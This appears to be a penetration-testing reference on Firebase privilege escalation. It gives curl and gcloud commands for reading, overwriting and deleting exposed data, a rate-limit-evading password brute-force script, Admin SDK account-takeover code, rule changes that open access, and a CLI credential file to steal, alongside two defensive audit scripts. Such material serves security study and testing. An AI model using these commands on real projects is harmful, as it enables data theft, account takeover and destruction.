GCP - Firebase Privesc
Firebase
Unauthenticated access to Firebase Realtime Database
The attacker does not need any special Firebase permissions to carry out this attack. It only requires a weak configuration in the Firebase Realtime Database security rules, where the rules are set to .read: true or .write: true, allowing public read or write access.
The attacker must identify the database URL, which usually follows the format: https://<project-id>.firebaseio.com/.
This URL can be obtained through mobile application reverse engineering (decompiling Android APKs or analyzing iOS apps), through analysis of configuration files such as google-services.json (Android) or GoogleService-Info.plist (iOS), through source code review of web applications, or through inspecting network traffic to identify requests to *.firebaseio.com domains.
The attacker identifies the database URL and checks whether it is publicly exposed, then retrieves the data and may write malicious content.
First, they check whether the database allows read access by appending .json to the URL.
curl https://<project-id>-default-rtdb.firebaseio.com/.json
If the response contains JSON data or null (instead of "Permission Denied"), the database allows read access. To check write access, the attacker can try sending a test write request using the Firebase REST API.
curl -X PUT https://<project-id>-default-rtdb.firebaseio.com/test.json -d '{"test": "data"}'
If the operation succeeds, the database also allows write access.
Data exposure in Cloud Firestore
The attacker does not need any special Firebase permissions to carry out this attack. It only requires a weakened configuration in the Cloud Firestore security rules, where the rules allow read or write access without authentication or with insufficient authentication. An example of a misconfigured rule that grants full access is:
service cloud.firestore {
  match /databases/{database}/documents/{document=**} {
    allow read, write: if true;
  }
}
This rule allows anyone to read and write all documents without any restriction.
Firestore rules are granular and apply per collection and document, so an error in a specific rule may expose only certain collections.
The attacker must identify the Firebase Project ID, which can be obtained through mobile app reverse engineering, analysis of configuration files such as google-services.json or GoogleService-Info.plist, reviewing the web application source code, or analysing network traffic to identify requests to firestore.googleapis.com.
The Firestore REST API uses the format:
https://firestore.googleapis.com/v1/projects/<PROJECT_ID>/databases/(default)/documents/<collection>/<document>
If the rules allow unauthenticated read access, the attacker can read collections and documents. First, they try to retrieve a specific collection:
curl https://firestore.googleapis.com/v1/projects/<PROJECT_ID>/databases/(default)/documents/<collection>
If the response includes JSON documents instead of a permission error, the collection is exposed. The attacker can enumerate all accessible collections by trying common names or analysing the application structure. To access a specific document:
curl https://firestore.googleapis.com/v1/projects/<PROJECT_ID>/databases/(default)/documents/<collection>/<document>
If the rules allow unauthenticated write access or have weak validation, the attacker can create new documents:
curl -X POST https://firestore.googleapis.com/v1/projects/<PROJECT_ID>/databases/(default)/documents/<collection> \
-H "Content-Type: application/json" \
-d '{
"fields": {
"name": {"stringValue": "Test"},
"email": {"stringValue": "test@example.com"}
}
}'
To modify an existing document, use PATCH:
curl -X PATCH https://firestore.googleapis.com/v1/projects/<PROJECT_ID>/databases/(default)/documents/users/<user-id> \
-H "Content-Type: application/json" \
-d '{
"fields": {
"role": {"stringValue": "admin"}
}
}'
To delete documents and cause a service disruption:
curl -X DELETE https://firestore.googleapis.com/v1/projects/<PROJECT_ID>/databases/(default)/documents/<collection>/<document>
File exposure in Firebase Storage
The attacker does not need any special Firebase permissions to carry out this attack. It only requires a vulnerable configuration in the Firebase Storage security rules, where the rules allow read or write access without authentication or with insufficient validation. Storage rules control read and write permissions independently, so an error in a rule can expose read-only access, write-only access, or both. An example of a misconfigured Storage rule that grants full access is:
service firebase.storage {
  match /b/{bucket}/o {
    match /{allPaths=**} {
      allow read, write: if true;
    }
  }
}
This rule allows read and write access to every object in the bucket without any restriction. Storage rules are granular and apply per path, so an error in a specific rule may expose only certain paths. The attacker must identify the storage bucket, which can be obtained through mobile application reverse engineering, analysis of configuration files such as google-services.json or GoogleService-Info.plist, web application source code review, or network traffic analysis to identify requests to firebasestorage.googleapis.com.
The Firebase Storage REST API uses the format: https://firebasestorage.googleapis.com/v0/b/<bucket>/o/<urlencode(path)>.
If the rules allow unauthenticated read access, the attacker can list and read the files. First, they list the bucket contents, optionally filtered by a path prefix.
curl "https://firebasestorage.googleapis.com/v0/b/<bucket>/o"
curl "https://firebasestorage.googleapis.com/v0/b/<bucket>/o?prefix=<path>"
If the response lists files instead of a permission error, those files are exposed. The attacker can view the contents of a file by specifying its path:
curl "https://firebasestorage.googleapis.com/v0/b/<bucket>/o/<urlencode(path)>"
If the rules allow unauthenticated write access or have weak validation, the attacker can upload malicious files. To upload a file through the REST API:
curl -X POST "https://firebasestorage.googleapis.com/v0/b/<bucket>/o?name=<path>" \
-H "Content-Type: <content-type>" \
--data-binary @<local-file>
The attacker can upload web shells, malware payloads, or large files to cause a denial of service. If the application processes or executes uploaded files, the attacker may achieve remote code execution. To delete files and cause a denial of service:
curl -X DELETE "https://firebasestorage.googleapis.com/v0/b/<bucket>/o/<path>"
Invoking publicly accessible Firebase Cloud Functions
The attacker does not need any special Firebase permissions to exploit this issue; it only requires that a Cloud Function is publicly reachable over HTTP without authentication.
A function is vulnerable when it is configured insecurely:
- It uses functions.https.onRequest, which does not enforce authentication (unlike onCall functions).
- The function code does not verify the user's authentication (for example, there is no check of request.auth or context.auth).
- The function is publicly accessible in IAM, meaning allUsers hold the roles/cloudfunctions.invoker role. This is the default behaviour for HTTP functions unless the developer has restricted access.
Firebase HTTP Cloud Functions are reachable through the following URLs:
https://<region>-<project-id>.cloudfunctions.net/<function-name>
https://<project-id>.web.app/<function-name> (when integrated with Firebase Hosting)
The attacker can discover these URLs through source code analysis, network traffic inspection, enumeration tools, or mobile app reverse engineering. If the function is publicly exposed and does not require authentication, the attacker can invoke it directly without credentials.
# Invoke public HTTP function with GET
curl "https://<region>-<project-id>.cloudfunctions.net/<function-name>"
# Invoke public HTTP function with POST and data
curl -X POST "https://<region>-<project-id>.cloudfunctions.net/<function-name>" \
-H "Content-Type: application/json" \
-d '{"param1": "value1", "param2": "value2"}'
If the function does not properly validate inputs, the attacker may attempt other attacks such as code injection or command injection.
Brute-force attack against Firebase Authentication with a weak password policy
The attacker does not need any special Firebase permissions to carry out this attack. It only requires that the Firebase API Key is exposed in mobile or web applications, and that the password policy has not been configured with stricter requirements than the defaults.
The attacker must identify the Firebase API Key, which can be obtained through mobile app reverse engineering, analysis of configuration files such as google-services.json or GoogleService-Info.plist, source code review of web applications (for example, in bootstrap.js), or network traffic analysis.
Firebase Authentication's REST API uses the endpoint:
https://identitytoolkit.googleapis.com/v1/accounts:signInWithPassword?key=<API_KEY>
to authenticate using email and password.
If Email Enumeration Protection is disabled, the API error responses can reveal whether an email exists in the system (EMAIL_NOT_FOUND vs. INVALID_PASSWORD), which allows the attacker to enumerate users before attempting to guess passwords. When this protection is enabled, the API returns the same error message for non-existent emails and for incorrect passwords, preventing user enumeration.
It is important to note that Firebase Authentication enforces rate limiting, which can block requests if many authentication attempts are made in a short period. The attacker would therefore need to add delays between attempts to avoid being rate limited.
The attacker identifies the API Key and performs authentication attempts with multiple passwords against known accounts. If Email Enumeration Protection is disabled, the attacker can enumerate the users present in the system by analysing the error responses:
# Attempt authentication with a known email and an incorrect password
curl -X POST "https://identitytoolkit.googleapis.com/v1/accounts:signInWithPassword?key=<API_KEY>" \
-H "Content-Type: application/json" \
-d '{
"email": "usuario@example.com",
"password": "password",
"returnSecureToken": true
}'
If the response contains EMAIL_NOT_FOUND, the email does not exist in the system. If it contains INVALID_PASSWORD, the email exists but the password is incorrect, confirming that the user is registered. Once a valid user has been identified, the attacker can perform brute-force attempts. It is important to include pauses between attempts to avoid Firebase Authentication's rate limiting mechanisms:
counter=1
for password in $(cat wordlist.txt); do
  echo "Intento $counter: probando contraseña '$password'"
  response=$(curl -s -X POST "https://identitytoolkit.googleapis.com/v1/accounts:signInWithPassword?key=<API_KEY>" \
    -H "Content-Type: application/json" \
    -d "{\"email\":\"usuario@example.com\",\"password\":\"$password\",\"returnSecureToken\":true}")
  if echo "$response" | grep -q "idToken"; then
    echo "Contraseña encontrada: $password (intento $counter)"
    break
  fi
  # Pause to stay under the rate limit
  sleep 1
  counter=$((counter + 1))
done
With the default password policy (minimum 6 characters, no complexity requirements), the attacker can try all possible combinations of 6-character passwords, which represents a relatively small search space compared to stricter password policies.
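To turn the manual checks from the Realtime Database, Firestore, Storage and Authentication sections into a repeatable audit of your own project, the following added example (not code from the original page) classifies the responses of the unauthenticated read probes and compares the two sign-in error responses to tell whether Email Enumeration Protection is active (the protected mode answers both cases with the same INVALID_LOGIN_CREDENTIALS code). All responses below are constructed samples embedded inline, modelled on the response shapes this page describes.

```python
import json

# Constructed responses (not captured from any real project) in the shapes this page
# describes: RTDB answers with the data or null, the Google APIs with {"error": {...}}.
PROBES = [
    ("rtdb", 200, '{"users": {"u1": {"email": "user@example.com"}}}'),
    ("rtdb", 200, "null"),
    ("rtdb", 401, '{"error": "Permission denied"}'),
    ("firestore", 200, '{"documents": [{"name": "projects/p/databases/(default)/'
                       'documents/users/u1", "fields": {}}]}'),
    ("firestore", 403, '{"error": {"code": 403, "message": "Missing or insufficient '
                       'permissions.", "status": "PERMISSION_DENIED"}}'),
    ("storage", 200, '{"prefixes": [], "items": [{"name": "uploads/avatar.png", '
                     '"bucket": "example.appspot.com"}]}'),
    ("storage", 403, '{"error": {"code": 403, "message": "Permission denied."}}'),
]


def classify_probe(service: str, status: int, body: str) -> str:
    """Classify the answer to an unauthenticated read probe as public, denied or unknown.

    service: "rtdb" (GET <db>/.json), "firestore" (GET .../documents/<collection>)
    or "storage" (GET /v0/b/<bucket>/o). A 200 without an error envelope means the
    rules let anonymous callers read; RTDB's null for an empty path still counts.
    """
    if service not in ("rtdb", "firestore", "storage"):
        raise ValueError(f"unsupported service: {service}")
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return "unknown"
    has_error = isinstance(data, dict) and "error" in data
    if status == 200 and not has_error:
        return "public"
    if status in (401, 403) and has_error:
        return "denied"
    return "unknown"


def exposed_services(probes) -> list[str]:
    """Services whose unauthenticated probe came back public; probes are (service, status, body)."""
    return sorted({svc for svc, status, body in probes
                   if classify_probe(svc, status, body) == "public"})


def enumeration_protected(unknown_email_resp: str, wrong_password_resp: str) -> bool:
    """Compare the signInWithPassword errors for a non-existent email and for a wrong
    password on an existing account. Identical codes mean Email Enumeration Protection
    is in effect; EMAIL_NOT_FOUND vs INVALID_PASSWORD means users can be enumerated."""
    def error_code(resp: str) -> str:
        # Identity Toolkit puts the code first in error.message ("CODE : detail"); keep the code.
        return json.loads(resp)["error"]["message"].split(" ")[0].split(":")[0]
    return error_code(unknown_email_resp) == error_code(wrong_password_resp)


if __name__ == "__main__":
    for svc, status, body in PROBES:
        print(f"{svc:9} {status} -> {classify_probe(svc, status, body)}")
    print("exposed:", exposed_services(PROBES))
```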
User management in Firebase Authentication
The attacker needs specific Firebase Authentication permissions to carry out this attack. The required permissions are:
- firebaseauth.users.create to create users
- firebaseauth.users.update to modify existing users
- firebaseauth.users.delete to delete users
- firebaseauth.users.get to retrieve user information
- firebaseauth.users.sendEmail to send emails to users
- firebaseauth.users.createSession to create user sessions
These permissions are contained in the roles/firebaseauth.admin role, which grants full read/write access to Firebase Authentication resources. They are also present in higher-level roles such as roles/firebase.developAdmin (which includes all firebaseauth.* permissions) and roles/firebase.admin (full access to all Firebase services).
To use the Firebase Admin SDK, the attacker would need to obtain service account credentials (a JSON file), which can be found on compromised systems, in publicly exposed code repositories, in compromised CI/CD systems, or through the compromise of developer accounts that have access to these credentials.
The first step is to initialise the Firebase Admin SDK using the service account credentials.
import firebase_admin
from firebase_admin import credentials, auth
cred = credentials.Certificate('path/to/serviceAccountKey.json')
firebase_admin.initialize_app(cred)
To create a malicious user with the victim's email, the attacker would use the Firebase Admin SDK to create a new account under that email address.
user = auth.create_user(
email='victima@example.com',
email_verified=False,
password='password123',
display_name='Usuario Malicioso',
disabled=False
)
print(f'Usuario creado: {user.uid}')
To modify an existing user, the attacker updates fields such as the email address, the verification status, or whether the account is disabled.
user = auth.update_user(
uid,
email='nuevo-email@example.com',
email_verified=True,
disabled=False
)
print(f'Usuario actualizado: {user.uid}')
To delete a user account and cause a denial of service, the attacker would submit a request to remove the user permanently.
auth.delete_user(uid)
print('Usuario eliminado exitosamente')
The attacker can also obtain information about existing users by looking them up by UID or by email address.
user = auth.get_user(uid)
print(f'Información del usuario: {user.uid}, {user.email}')
user = auth.get_user_by_email('usuario@example.com')
print(f'Información del usuario: {user.uid}, {user.email}')
Additionally, the attacker can generate email verification links or password reset links to change a user's password and gain access to their account.
link = auth.generate_email_verification_link(email)
print(f'Link de verificación: {link}')
link = auth.generate_password_reset_link(email)
print(f'Link de reset: {link}')
Modification of security rules in Firebase services
The attacker needs specific permissions to modify security rules, depending on the service. For Cloud Firestore and Firebase Cloud Storage, the required permissions are firebaserules.rulesets.create to create rulesets and firebaserules.releases.create to deploy releases. These permissions are contained in the roles/firebaserules.admin role or in higher-level roles such as roles/firebase.developAdmin and roles/firebase.admin. For Firebase Realtime Database, the required permission is firebasedatabase.instances.update.
The attacker must use the Firebase REST API to modify the security rules. First, the attacker needs to obtain an access token using service account credentials. To obtain an access token:
gcloud auth activate-service-account --key-file=path/to/serviceAccountKey.json
ACCESS_TOKEN=$(gcloud auth print-access-token)
To modify the Firebase Realtime Database rules:
curl -X PUT "https://<project-id>-default-rtdb.firebaseio.com/.settings/rules.json?access_token=$ACCESS_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"rules": {
".read": true,
".write": true
}
}'
To modify the Cloud Firestore rules, the attacker must create a ruleset and then deploy it:
curl -X POST "https://firebaserules.googleapis.com/v1/projects/<project-id>/rulesets" \
-H "Authorization: Bearer $ACCESS_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"source": {
"files": [{
"name": "firestore.rules",
"content": "rules_version = '\''2'\'';\nservice cloud.firestore {\n match /databases/{database}/documents {\n match /{document=**} {\n allow read, write: if true;\n }\n }\n}"
}]
}
}'
The previous command returns the name of the created ruleset (format projects/...), which is then referenced as rulesetName when updating the release:
curl -X PATCH "https://firebaserules.googleapis.com/v1/projects/<project-id>/releases/cloud.firestore" \
-H "Authorization: Bearer $ACCESS_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"release": {
"name": "projects/<project-id>/releases/cloud.firestore",
"rulesetName": "projects/<project-id>/rulesets/<ruleset-id>"
}
}'
To modify the Firebase Cloud Storage rules:
curl -X POST "https://firebaserules.googleapis.com/v1/projects/<project-id>/rulesets" \
-H "Authorization: Bearer $ACCESS_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"source": {
"files": [{
"name": "storage.rules",
"content": "service firebase.storage {\n match /b/{bucket}/o {\n match /{allPaths=**} {\n allow read, write: if true;\n }\n }\n}"
}]
}
}'
The previous command returns the name of the created ruleset (format projects/...), which is then referenced as rulesetName when updating the release for the bucket:
curl -X PATCH "https://firebaserules.googleapis.com/v1/projects/<project-id>/releases/firebase.storage/<bucket-id>" \
-H "Authorization: Bearer $ACCESS_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"release": {
"name": "projects/<project-id>/releases/firebase.storage/<bucket-id>",
"rulesetName": "projects/<project-id>/rulesets/<ruleset-id>"
}
}'
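As a defender's counterpart to the open rules shown in the Realtime Database, Firestore and Storage sections and to the rulesets deployed through the Rules API above, the following added example (not code from the original page or from Firebase) lints rule sources for allow statements that grant access to anonymous callers. The rule texts and the ruleset body are constructed samples, and the auth-check test is a heuristic: a condition that never references request.auth (rules language) or auth (Realtime Database) is treated as missing an authentication check.

```python
import json
import re

# Constructed samples (not from any real project), mirroring the rule shapes on this page.
RTDB_RULES = json.dumps({"rules": {
    "public": {".read": True},
    "users": {"$uid": {".read": "auth != null && auth.uid == $uid",
                       ".write": "auth.uid == $uid"}},
}})
FIRESTORE_OPEN = ("rules_version = '2';\nservice cloud.firestore {\n"
                  "  match /databases/{database}/documents {\n"
                  "    match /{document=**} {\n      allow read, write: if true;\n    }\n  }\n}")
# The time-limited "test mode" rule: no `if true`, but still no authentication check.
FIRESTORE_TEST_MODE = ("service cloud.firestore {\n  match /databases/{database}/documents {\n"
                       "    match /{document=**} {\n"
                       "      allow read, write: if request.time < timestamp.date(2024, 1, 1);\n"
                       "    }\n  }\n}")
STORAGE_HARDENED = ("service firebase.storage {\n  match /b/{bucket}/o {\n"
                    "    match /users/{uid}/{allPaths=**} {\n"
                    "      allow read, write: if request.auth != null && request.auth.uid == uid;\n"
                    "    }\n  }\n}")
# Body of the rulesets request shown on this page, carrying the open Firestore rules.
RULESET_BODY = json.dumps({"source": {"files": [
    {"name": "firestore.rules", "content": FIRESTORE_OPEN}]}})

# `allow <ops>;` or `allow <ops>: if <condition>;` in the Firestore/Storage rules language.
ALLOW_RE = re.compile(r"allow\s+([\w\s,]+?)\s*(?::\s*if\s+(.+?))?\s*;", re.S)


def lint_rules_language(source: str) -> list[str]:
    """Flag allow statements that grant access to unauthenticated callers.

    Heuristic: a missing condition or `if true` is public; a condition that never
    mentions request.auth (e.g. the time-based test-mode rule) is treated as public too.
    """
    findings = []
    for m in ALLOW_RE.finditer(source):
        ops = ", ".join(o.strip() for o in m.group(1).split(","))
        cond = (m.group(2) or "").strip()
        if cond in ("", "true"):
            findings.append(f"unconditional allow {ops}")
        elif "request.auth" not in cond:
            findings.append(f"allow {ops} without an auth check: if {cond}")
    return findings


def lint_rtdb_rules(rules_json: str) -> list[str]:
    """Walk a Realtime Database rules document and flag public .read/.write nodes."""
    findings = []

    def walk(node, path):
        if not isinstance(node, dict):
            return
        for key, value in node.items():
            if key in (".read", ".write"):
                if value is True or str(value).strip() == "true":
                    findings.append(f"{path or '/'}: {key} is public (true)")
                elif isinstance(value, str) and "auth" not in value:
                    findings.append(f"{path or '/'}: {key} has no auth check: {value}")
            else:
                walk(value, f"{path}/{key}")

    walk(json.loads(rules_json).get("rules", {}), "")
    return findings


def lint_ruleset_body(body: str) -> dict[str, list[str]]:
    """Lint every file in a Rules API ruleset body (the JSON shape POSTed to
    /v1/projects/<project-id>/rulesets on this page, or returned by GET on a ruleset)."""
    files = json.loads(body)["source"]["files"]
    return {f["name"]: lint_rules_language(f["content"]) for f in files}


if __name__ == "__main__":
    print(lint_rtdb_rules(RTDB_RULES))
    print(lint_rules_language(FIRESTORE_TEST_MODE))
    print(lint_rules_language(STORAGE_HARDENED))
    print(lint_ruleset_body(RULESET_BODY))
```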
Exfiltration and manipulation of data in Cloud Firestore
Cloud Firestore uses the same infrastructure and permission model as Cloud Datastore, so Datastore IAM permissions apply directly to Firestore. To modify TTL policies, the datastore.indexes.update permission is required. To export data, datastore.databases.export is required. To import data, datastore.databases.import is required. To perform bulk deletion of data, datastore.databases.bulkDelete is required.
For backup and restore operations, specific permissions are required:
- datastore.backups.get and datastore.backups.list to list and retrieve details of available backups
- datastore.backups.delete to delete backups
- datastore.backups.restoreDatabase to restore a database from a backup
- datastore.backupSchedules.create and datastore.backupSchedules.delete to manage backup schedules
When a TTL policy is created, a designated property is chosen to identify the entities eligible for deletion. This TTL property must be of the Date and Time type. The attacker can choose a property that already exists or specify a property they plan to add later. If the field value is a date in the past, the document becomes eligible for deletion immediately. The attacker can use the gcloud CLI to modify TTL policies.
# Enable TTL
gcloud firestore fields ttls update expireAt \
--collection-group=users \
--enable-ttl
# Disable TTL
gcloud firestore fields ttls update expireAt \
--collection-group=users \
--disable-ttl
To export and exfiltrate the data, the attacker can use the gcloud CLI.
gcloud firestore export gs://<bucket-name> --project=<project-id> --async --database='(default)'
To import malicious data:
gcloud firestore import gs://<bucket-name>/<path> --project=<project-id> --async --database='(default)'
To bulk delete data and cause a denial of service, the attacker can use the gcloud Firestore bulk-delete tool to remove entire collections.
gcloud firestore bulk-delete \
--collection-ids=users,posts,messages \
--database='(default)' \
--project=<project-id>
For backup and restore operations, the attacker can create scheduled backups to capture the current state of the database, list existing backups, restore from a backup to overwrite recent changes, delete backups to cause permanent data loss, and remove scheduled backups. To create a daily backup schedule that generates a backup immediately:
gcloud firestore backups schedules create \
--database='(default)' \
--recurrence=daily \
--retention=14w \
--project=<project-id>
To restore from a specific backup, the attacker can create a new database using the data contained in that backup. The restore operation writes the backup data into a new database, meaning that an existing DATABASE_ID cannot be used.
gcloud firestore databases restore \
--source-backup=projects/<project-id>/locations/<location>/backups/<backup-id> \
--destination-database='<new-database-id>' \
--project=<project-id>
To delete a backup and cause permanent data loss:
gcloud firestore backups delete \
--backup=<backup-id> \
--project=<project-id>
Theft and misuse of Firebase CLI credentials
The attacker does not need any special Firebase permissions to carry out this attack, but needs access to the developer's local system or to the Firebase CLI credentials file. These credentials are stored in a JSON file located at:
- Linux/macOS: ~/.config/configstore/firebase-tools.json
- Windows: C:\Users\[User]\.config\configstore\firebase-tools.json
This file contains authentication tokens, including refresh_token and access_token, which allow the attacker to authenticate as the user who previously ran firebase login.
The attacker obtains access to the Firebase CLI credentials file. They can then copy the entire file to their own system, and the Firebase CLI will automatically use the credentials from its default location. After doing so, the attacker can see all Firebase projects available to that user.
firebase projects:list